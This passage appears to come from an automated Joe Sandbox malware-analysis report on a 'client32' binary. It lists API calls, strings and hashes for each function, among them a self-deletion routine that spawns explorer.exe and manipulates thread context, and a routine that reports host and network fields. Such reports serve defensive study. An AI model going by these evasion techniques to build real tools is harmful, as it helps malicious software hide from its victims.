                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                Strings
                                                                                                • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenwvsprintf
                                                                                                • String ID: Error %d Opening regkey %s
                                                                                                • API String ID: 1772833024-3994271378
                                                                                                • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(NSMTRACE), ref: 11146FF9
                                                                                                  • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                • String ID: NSMTRACE
                                                                                                • API String ID: 4133054770-4175627554
                                                                                                • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                                • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 69CE4F78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: psapi.dll
                                                                                                • API String ID: 1029625771-80456845
                                                                                                • Opcode ID: 50c213185dc4a2aec03a863bf861d659d87c1fb17917f806c41fd09ca274a6be
                                                                                                • Instruction ID: cb7d81cf76920ceecbba5852836574712053f6f5435441496cb39b08ff67ac30
                                                                                                • Opcode Fuzzy Hash: 50c213185dc4a2aec03a863bf861d659d87c1fb17917f806c41fd09ca274a6be
                                                                                                • Instruction Fuzzy Hash: 80E009B1901B108F93B0CF39D504646BBF0BB086503118A3E959EC3A00E330A5848F80
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 110262C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: psapi.dll
                                                                                                • API String ID: 1029625771-80456845
                                                                                                • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                                • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110750EF
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary_memset
                                                                                                • String ID:
                                                                                                • API String ID: 1654520187-0
                                                                                                • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                                • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                                APIs
                                                                                                • ioctlsocket.WSOCK32(962D34B3,4004667F,00000000), ref: 69CE5D1F
                                                                                                • select.WSOCK32(00000001,?,00000000,?,00000000), ref: 69CE5D62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ioctlsocketselect
                                                                                                • String ID:
                                                                                                • API String ID: 1457273030-0
                                                                                                • Opcode ID: ca69c2054d0c6bd44aeb5ec229908b0d41d4ce5f04bff617c0505194f69327f5
                                                                                                • Instruction ID: c35f445d33fa9c7c8393e4c43e5a72686507a19eca1ac89014bc2d64d5a5cf3e
                                                                                                • Opcode Fuzzy Hash: ca69c2054d0c6bd44aeb5ec229908b0d41d4ce5f04bff617c0505194f69327f5
                                                                                                • Instruction Fuzzy Hash: 842131749012188BEB28CF14C9697EDB7B9EF48304F40C1EAA90E97281D7705F94DF90
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 110608C3
                                                                                                • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1338273076-0
                                                                                                • Opcode ID: 95f78effd54cc4b974209cb52787d5f98ef0533aa93d71aaf1408ef8c9560b95
                                                                                                • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                                • Opcode Fuzzy Hash: 95f78effd54cc4b974209cb52787d5f98ef0533aa93d71aaf1408ef8c9560b95
                                                                                                • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110886DF
                                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection_memset
                                                                                                • String ID:
                                                                                                • API String ID: 453477542-0
                                                                                                • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                                • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                • ExtractIconExA.SHELL32(?,00000000,0006037F,000A035F,00000001), ref: 11145068
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExtractFileIconModuleName
                                                                                                • String ID:
                                                                                                • API String ID: 3911389742-0
                                                                                                • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                APIs
                                                                                                  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                • __lock_file.LIBCMT ref: 11164CBE
                                                                                                  • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                                • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2800547568-0
                                                                                                • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6C26
                                                                                                • Sleep.KERNEL32(00000064), ref: 69CF6C5B
                                                                                                  • Part of subcall function 69CF6940: GetTickCount.KERNEL32 ref: 69CF6950
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 4250438611-0
                                                                                                • Opcode ID: f14fa07af11ca6ee040f31e8791be830c8208a2f282e887052611d89a04e596f
                                                                                                • Instruction ID: 8e45ce4bd9c3c259cb5ecdc3e22d9b5d980bc9dcb84ec1e9459ec7d266062130
                                                                                                • Opcode Fuzzy Hash: f14fa07af11ca6ee040f31e8791be830c8208a2f282e887052611d89a04e596f
                                                                                                • Instruction Fuzzy Hash: 17F08231600648CBEF54DF75E755318B3A1EF62359F12807AC652A6580EBB69C82CB01
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 11176045
                                                                                                  • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                                  • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                                  • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                • __tzset_nolock.LIBCMT ref: 11176056
                                                                                                  • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                                  • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                                  • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                                  • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                                  • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                                  • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 1828324828-0
                                                                                                • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                                • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                                APIs
                                                                                                  • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                  • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                                • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                • String ID:
                                                                                                • API String ID: 3768737497-0
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LockitLockit::_std::_
                                                                                                • String ID:
                                                                                                • API String ID: 3382485803-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3660427363-0
                                                                                                APIs
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationToken
                                                                                                • String ID:
                                                                                                • API String ID: 4114910276-0
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,69D06F16,00000000,?,69D0D40B,00000001,69D06F16,00000000,00000000,00000000,?,69D06F16,00000001,00000214), ref: 69D0A0C5
                                                                                                  • Part of subcall function 69D060F9: __getptd_noexit.LIBCMT ref: 69D060F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 328603210-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf
                                                                                                • String ID:
                                                                                                • API String ID: 597827344-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __waccess_s
                                                                                                • String ID:
                                                                                                • API String ID: 4272103461-0
                                                                                                • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                                • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __fsopen
                                                                                                • String ID:
                                                                                                • API String ID: 3646066109-0
                                                                                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                                APIs
                                                                                                • _NSMClient32@8.PCICL32(?,?,?,00A110A2,00000000), ref: 00A1100B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644020864.0000000000A11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A10000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644017470.0000000000A10000.00000002.00000001.01000000.00000008.sdmp
                                                                                                • Associated: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_a10000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Client32@8
                                                                                                • String ID:
                                                                                                • API String ID: 433899448-0
                                                                                                • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                • Instruction ID: 04c16419071c492867824e58ac5f7ae5312449a03cbd9bc3a6534501e21876ec
                                                                                                • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                • Instruction Fuzzy Hash: 98B092B251434D9B8714EE98E941CBB339CAA98600B040809BE0543282CA61FCA09671
                                                                                                APIs
                                                                                                • RtlEncodePointer.NTDLL(00000000,69D0FE32,69D2D878,00000314,00000000,?,?,?,?,?,69D05FD4,69D2D878,Microsoft Visual C++ Runtime Library,00012010), ref: 69D06D79
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID:
                                                                                                • API String ID: 2118026453-0
                                                                                                • Opcode ID: 52dbc25190f2025ad29e56c6d78e11d4e884c1b3f75122c5de280d843c6548e6
                                                                                                • Instruction ID: 6690b892d0b18a12aa1e57c31bd0b69fd6b9023f2f196661a71a6a3dc3fb3408
                                                                                                • Opcode Fuzzy Hash: 52dbc25190f2025ad29e56c6d78e11d4e884c1b3f75122c5de280d843c6548e6
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                • RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID:
                                                                                                • API String ID: 2118026453-0
                                                                                                • Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                • Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
                                                                                                • Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • InitializeCriticalSection.KERNEL32(0000017C,Client,1102B420,11027AC0,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1110F33F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection_malloc_memsetwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1627046820-0
                                                                                                • Opcode ID: 167354537e07327afa1a8aeaad38a5d06d29b668775e724a074324fe4889291d
                                                                                                • Instruction ID: 00408c7d5724fe509ae1f0f643d2fec4410581e75950b17c3fc13ecd8487adab
                                                                                                • Opcode Fuzzy Hash: 167354537e07327afa1a8aeaad38a5d06d29b668775e724a074324fe4889291d
                                                                                                • Instruction Fuzzy Hash: 4001C4B56047099FC724CF39D880AC7BBF5EB89714F10892EE9AD87340D775A851CB90
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 11127400
                                                                                                • _memset.LIBCMT ref: 1112741D
                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 11127455
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                                • _strrchr.LIBCMT ref: 111274AA
                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000), ref: 111274E3
                                                                                                • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000), ref: 1112750F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1112751C
                                                                                                • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000), ref: 11127537
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                                • wsprintfA.USER32 ref: 11127561
                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                                • CloseHandle.KERNEL32(?), ref: 1112759E
                                                                                                • CloseHandle.KERNEL32(?), ref: 111275A7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 111275AA
                                                                                                • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?), ref: 111275E0
                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                                • DuplicateHandle.KERNEL32 ref: 11127688
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                                • _strrchr.LIBCMT ref: 111276AB
                                                                                                • _memmove.LIBCMT ref: 11127724
                                                                                                • GetThreadContext.KERNEL32(?,?), ref: 11127744
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                                • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                • API String ID: 2219718054-800295887
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _sprintf$CriticalEnterSection_calloc_memset_strncpy
                                                                                                • String ID: %s|%d$%s|%s|%s|%s|%s|%s|%s|%s$CHANNEL$CHATID$CLASS$CLIENTCOUNT$CLIENT_IP_ADDRESS$CLIENT_NAME$CONTEXT$DEPT$END_CLIENT$FAILED_REASON$HOSTNAME$INACTIVE$MACADDRESS$MORE$PORT$SERVICENAME$SERVICETYPE$STATUS$USER
                                                                                                • API String ID: 2511565166-3216938587
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(00000057), ref: 69CF4F6D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CF4FE9
                                                                                                • LeaveCriticalSection.KERNEL32 ref: 69CF5002
                                                                                                • _free.LIBCMT ref: 69CF5086
                                                                                                • _free.LIBCMT ref: 69CF50BA
